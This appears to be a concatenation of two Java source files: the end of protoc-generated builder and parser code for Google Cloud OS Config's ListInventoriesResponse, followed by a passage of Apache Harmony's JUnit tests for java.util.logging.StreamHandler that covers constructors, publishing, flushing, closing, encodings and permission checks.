/** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(builderForValue.build()); onChanged(); } else { inventoriesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories( int index, com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(index, builderForValue.build()); onChanged(); } else { inventoriesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addAllInventories( java.lang.Iterable<? extends com.google.cloud.osconfig.v1.Inventory> values) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, inventories_); onChanged(); } else { inventoriesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder clearInventories() { if (inventoriesBuilder_ == null) { inventories_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { inventoriesBuilder_.clear(); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder removeInventories(int index) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.remove(index); onChanged(); } else { inventoriesBuilder_.remove(index); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder getInventoriesBuilder(int index) { return getInventoriesFieldBuilder().getBuilder(index); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.InventoryOrBuilder getInventoriesOrBuilder(int index) { if (inventoriesBuilder_ == null) { return inventories_.get(index); } else { return inventoriesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<? extends com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesOrBuilderList() { if (inventoriesBuilder_ != null) { return inventoriesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(inventories_); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder addInventoriesBuilder() { return getInventoriesFieldBuilder() .addBuilder(com.google.cloud.osconfig.v1.Inventory.getDefaultInstance()); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder addInventoriesBuilder(int index) { return getInventoriesFieldBuilder() .addBuilder(index, com.google.cloud.osconfig.v1.Inventory.getDefaultInstance()); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<com.google.cloud.osconfig.v1.Inventory.Builder> getInventoriesBuilderList() { return getInventoriesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesFieldBuilder() { if (inventoriesBuilder_ == null) { inventoriesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, com.google.cloud.osconfig.v1.InventoryOrBuilder>( inventories_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); inventories_ = null; } return inventoriesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.osconfig.v1.ListInventoriesResponse) } // @@protoc_insertion_point(class_scope:google.cloud.osconfig.v1.ListInventoriesResponse) private static final com.google.cloud.osconfig.v1.ListInventoriesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.osconfig.v1.ListInventoriesResponse(); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListInventoriesResponse> PARSER = new com.google.protobuf.AbstractParser<ListInventoriesResponse>() { @java.lang.Override public ListInventoriesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListInventoriesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListInventoriesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/harmony
33,668
classlib/modules/logging/src/test/java/org/apache/harmony/logging/tests/java/util/logging/StreamHandlerTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.harmony.logging.tests.java.util.logging; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.io.PrintStream; import java.io.UnsupportedEncodingException; import java.nio.CharBuffer; import java.nio.charset.Charset; import java.nio.charset.CharsetEncoder; import java.nio.charset.CodingErrorAction; import java.security.Permission; import java.util.Arrays; import java.util.Properties; import java.util.logging.Filter; import java.util.logging.Formatter; import java.util.logging.Handler; import java.util.logging.Level; import java.util.logging.LogManager; import java.util.logging.LogRecord; import java.util.logging.LoggingPermission; import java.util.logging.SimpleFormatter; import java.util.logging.StreamHandler; import junit.framework.TestCase; import org.apache.harmony.logging.tests.java.util.logging.HandlerTest.NullOutputStream; import org.apache.harmony.logging.tests.java.util.logging.util.EnvironmentHelper; import tests.util.CallVerificationStack; /** * Test the class StreamHandler. */ public class StreamHandlerTest extends TestCase { private final static String INVALID_LEVEL = "impossible_level"; private final PrintStream err = System.err; private OutputStream errSubstituteStream = null; private static String className = StreamHandlerTest.class.getName(); private static CharsetEncoder encoder; static { encoder = Charset.forName("iso-8859-1").newEncoder(); encoder.onMalformedInput(CodingErrorAction.REPLACE); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); } /* * @see TestCase#setUp() */ protected void setUp() throws Exception { super.setUp(); errSubstituteStream = new NullOutputStream(); System.setErr(new PrintStream(errSubstituteStream)); } /* * @see TestCase#tearDown() */ protected void tearDown() throws Exception { LogManager.getLogManager().reset(); CallVerificationStack.getInstance().clear(); System.setErr(err); super.tearDown(); } /* * Test the constructor with no parameter, and no relevant log manager * properties are set. */ public void testConstructor_NoParameter_NoProperties() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with insufficient privilege. */ public void testConstructor_NoParameter_InsufficientPrivilege() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); } finally { System.setSecurityManager(oldMan); } } /* * Test the constructor with no parameter, and valid relevant log manager * properties are set. */ public void testConstructor_NoParameter_ValidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(h.getLevel(), Level.parse("FINE")); assertTrue(h.getFormatter() instanceof MockFormatter); assertTrue(h.getFilter() instanceof MockFilter); assertEquals("iso-8859-1", h.getEncoding()); } /* * Test the constructor with no parameter, and invalid relevant log manager * properties are set. */ public void testConstructor_NoParameter_InvalidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", INVALID_LEVEL); p.put("java.util.logging.StreamHandler.filter", className + ""); p.put("java.util.logging.StreamHandler.formatter", className + ""); p.put("java.util.logging.StreamHandler.encoding", "XXXX"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals(INVALID_LEVEL, LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("XXXX", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); h.publish(new LogRecord(Level.SEVERE, "test")); assertTrue(CallVerificationStack.getInstance().empty()); assertNull(h.getEncoding()); } /* * Test the constructor with normal parameter values, and no relevant log * manager properties are set. */ public void testConstructor_HasParameters_NoProperties() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with insufficient privilege. */ public void testConstructor_HasParameter_InsufficientPrivilege() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } finally { System.setSecurityManager(oldMan); } } /* * Test the constructor with normal parameter values, and valid relevant log * manager properties are set. */ public void testConstructor_HasParameters_ValidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(h.getLevel(), Level.parse("FINE")); assertTrue(h.getFormatter() instanceof MockFormatter2); assertTrue(h.getFilter() instanceof MockFilter); assertEquals("iso-8859-1", h.getEncoding()); } /* * Test the constructor with normal parameter, and invalid relevant log * manager properties are set. */ public void testConstructor_HasParameters_InvalidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", INVALID_LEVEL); p.put("java.util.logging.StreamHandler.filter", className + ""); p.put("java.util.logging.StreamHandler.formatter", className + ""); p.put("java.util.logging.StreamHandler.encoding", "XXXX"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals(INVALID_LEVEL, LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("XXXX", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with null formatter, and invalid relevant log manager * properties are set. */ public void testConstructor_HasParameters_ValidPropertiesNullStream() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); try { new StreamHandler(new ByteArrayOutputStream(), null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test the constructor with null output stream, and invalid relevant log * manager properties are set. */ public void testConstructor_HasParameters_ValidPropertiesNullFormatter() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); try { new StreamHandler(null, new MockFormatter2()); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test close() when having sufficient privilege, and a record has been * written to the output stream. */ public void testClose_SufficientPrivilege_NormalClose() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.publish(new LogRecord(Level.SEVERE, "testClose_SufficientPrivilege_NormalClose msg")); h.close(); assertEquals("close", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); CallVerificationStack.getInstance().clear(); assertTrue(aos.toString().endsWith("MockFormatter_Tail")); h.close(); } /* * Test close() when having sufficient privilege, and an output stream that * always throws exceptions. */ public void testClose_SufficientPrivilege_Exception() { ByteArrayOutputStream aos = new MockExceptionOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.publish(new LogRecord(Level.SEVERE, "testClose_SufficientPrivilege_Exception msg")); h.flush(); h.close(); } /* * Test close() when having sufficient privilege, and no record has been * written to the output stream. */ public void testClose_SufficientPrivilege_DirectClose() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.close(); assertEquals("close", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); CallVerificationStack.getInstance().clear(); assertEquals("MockFormatter_HeadMockFormatter_Tail", aos.toString() ); } /* * Test close() when having insufficient privilege. */ public void testClose_InsufficientPrivilege() { SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); try { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter()); h.close(); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } } /* * Test close() when having no output stream. */ public void testClose_NoOutputStream() { StreamHandler h = new StreamHandler(); h.close(); } /* * Test flush(). */ public void testFlush_Normal() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.flush(); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); CallVerificationStack.getInstance().clear(); } /* * Test flush() when having no output stream. */ public void testFlush_NoOutputStream() { StreamHandler h = new StreamHandler(); h.flush(); } /* * Test isLoggable(), use no filter, having output stream */ public void testIsLoggable_NoOutputStream() { StreamHandler h = new StreamHandler(); LogRecord r = new LogRecord(Level.INFO, null); assertFalse(h.isLoggable(r)); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); h.setLevel(Level.CONFIG); assertFalse(h.isLoggable(r)); r.setLevel(Level.OFF); h.setLevel(Level.OFF); assertFalse(h.isLoggable(r)); } /* * Test isLoggable(), use no filter, having output stream */ public void testIsLoggable_NoFilter() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); LogRecord r = new LogRecord(Level.INFO, null); assertTrue(h.isLoggable(r)); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); h.setLevel(Level.CONFIG); assertTrue(h.isLoggable(r)); r.setLevel(Level.OFF); h.setLevel(Level.OFF); assertFalse(h.isLoggable(r)); } /* * Test isLoggable(), use a filter, having output stream */ public void testIsLoggable_WithFilter() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); LogRecord r = new LogRecord(Level.INFO, null); h.setFilter(new MockFilter()); assertFalse(h.isLoggable(r)); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.CONFIG); assertFalse(h.isLoggable(r)); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test isLoggable(), null log record, having output stream. Handler should * call ErrorManager to handle exceptional case */ public void testIsLoggable_Null() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); assertFalse(h.isLoggable(null)); } /* * Test isLoggable(), null log record, without output stream */ public void testIsLoggable_Null_NoOutputStream() { StreamHandler h = new StreamHandler(); assertFalse(h.isLoggable(null)); } /* * Test publish(), use no filter, having output stream, normal log record. */ public void testPublish_NoOutputStream() { StreamHandler h = new StreamHandler(); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoOutputStream"); h.publish(r); h.setLevel(Level.WARNING); h.publish(r); h.setLevel(Level.CONFIG); h.publish(r); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); } /* * Test publish(), use no filter, having output stream, normal log record. */ public void testPublish_NoFilter() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoFilter"); h.setLevel(Level.INFO); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter", aos .toString()); h.setLevel(Level.WARNING); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter", aos .toString()); h.setLevel(Level.CONFIG); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter" + "testPublish_NoFilter", aos.toString()); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter" + "testPublish_NoFilter", aos.toString()); } /* * Test publish(), use a filter, having output stream, normal log record. */ public void testPublish_WithFilter() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setFilter(new MockFilter()); LogRecord r = new LogRecord(Level.INFO, "testPublish_WithFilter"); h.setLevel(Level.INFO); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.WARNING); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertTrue(CallVerificationStack.getInstance().empty()); h.setLevel(Level.CONFIG); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertSame(r, CallVerificationStack.getInstance().pop()); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test publish(), null log record, handler should call ErrorManager to * handle exceptional case */ public void testPublish_Null() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); h.publish(null); } /* * Test publish(), null log record, without output stream */ public void testPublish_Null_NoOutputStream() { StreamHandler h = new StreamHandler(); h.publish(null); // regression test for Harmony-1279 MockFilter filter = new MockFilter(); h.setLevel(Level.FINER); h.setFilter(filter); LogRecord record = new LogRecord(Level.FINE, "abc"); h.publish(record); // verify that filter.isLoggable is not called, because there's no // associated output stream. assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test publish(), a log record with empty msg, having output stream */ public void testPublish_EmptyMsg() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, ""); h.publish(r); h.flush(); assertEquals("MockFormatter_Head", aos.toString()); } /* * Test publish(), a log record with null msg, having output stream */ public void testPublish_NullMsg() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, null); h.publish(r); h.flush(); assertEquals("MockFormatter_Head", aos.toString()); } /* * Test publish(), after close. */ public void testPublish_AfterClose() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); assertSame(h.getLevel(), Level.FINE); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoFormatter"); assertTrue(h.isLoggable(r)); h.close(); assertFalse(h.isLoggable(r)); h.publish(r); h.flush(); assertEquals("MockFormatter_HeadMockFormatter_Tail", aos.toString()); } /* * Test setEncoding() method with supported encoding. */ public void testSetEncoding_Normal() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setEncoding("iso-8859-1"); assertEquals("iso-8859-1", h.getEncoding()); LogRecord r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); byte[] bytes = encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array(); assertTrue(Arrays.equals(bytes, aos.toByteArray())); } /* * Test setEncoding() method with supported encoding, after a log record * has been written. */ public void testSetEncoding_AfterPublish() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setEncoding("iso-8859-1"); assertEquals("iso-8859-1", h.getEncoding()); LogRecord r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); assertTrue(Arrays.equals(aos.toByteArray(), encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array())); h.setEncoding("iso8859-1"); assertEquals("iso8859-1", h.getEncoding()); r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); assertFalse(Arrays.equals(aos.toByteArray(), encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69" + "testSetEncoding_Normal2")).array())); byte[] b0 = aos.toByteArray(); byte[] b1 = encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array(); byte[] b2 = encoder.encode(CharBuffer.wrap("\u6881\u884D\u8F69")) .array(); byte[] b3 = new byte[b1.length + b2.length]; System.arraycopy(b1, 0, b3, 0, b1.length); System.arraycopy(b2, 0, b3, b1.length, b2.length); assertTrue(Arrays.equals(b0, b3)); } /* * Test setEncoding() methods with null. */ public void testSetEncoding_Null() throws Exception { StreamHandler h = new StreamHandler(); h.setEncoding(null); assertNull(h.getEncoding()); } /* * Test setEncoding() methods with unsupported encoding. */ public void testSetEncoding_Unsupported() { StreamHandler h = new StreamHandler(); try { h.setEncoding("impossible"); fail("Should throw UnsupportedEncodingException!"); } catch (UnsupportedEncodingException e) { // expected } assertNull(h.getEncoding()); } /* * Test setEncoding() with insufficient privilege. */ public void testSetEncoding_InsufficientPrivilege() throws Exception { StreamHandler h = new StreamHandler(); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { h.setEncoding("iso-8859-1"); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } assertNull(h.getEncoding()); System.setSecurityManager(new MockSecurityManager()); // set an invalid value try { h.setEncoding("impossible"); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } assertNull(h.getEncoding()); } /* * Test setEncoding() methods will flush a stream before setting. */ public void testSetEncoding_FlushBeforeSetting() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "abcd"); h.publish(r); assertFalse(aos.toString().indexOf("abcd") > 0); h.setEncoding("iso-8859-1"); assertTrue(aos.toString().indexOf("abcd") > 0); } /* * Test setOutputStream() with null. */ public void testSetOutputStream_null() { MockStreamHandler h = new MockStreamHandler( new ByteArrayOutputStream(), new SimpleFormatter()); try { h.setOutputStream(null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test setOutputStream() under normal condition. */ public void testSetOutputStream_Normal() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); MockStreamHandler h = new MockStreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, 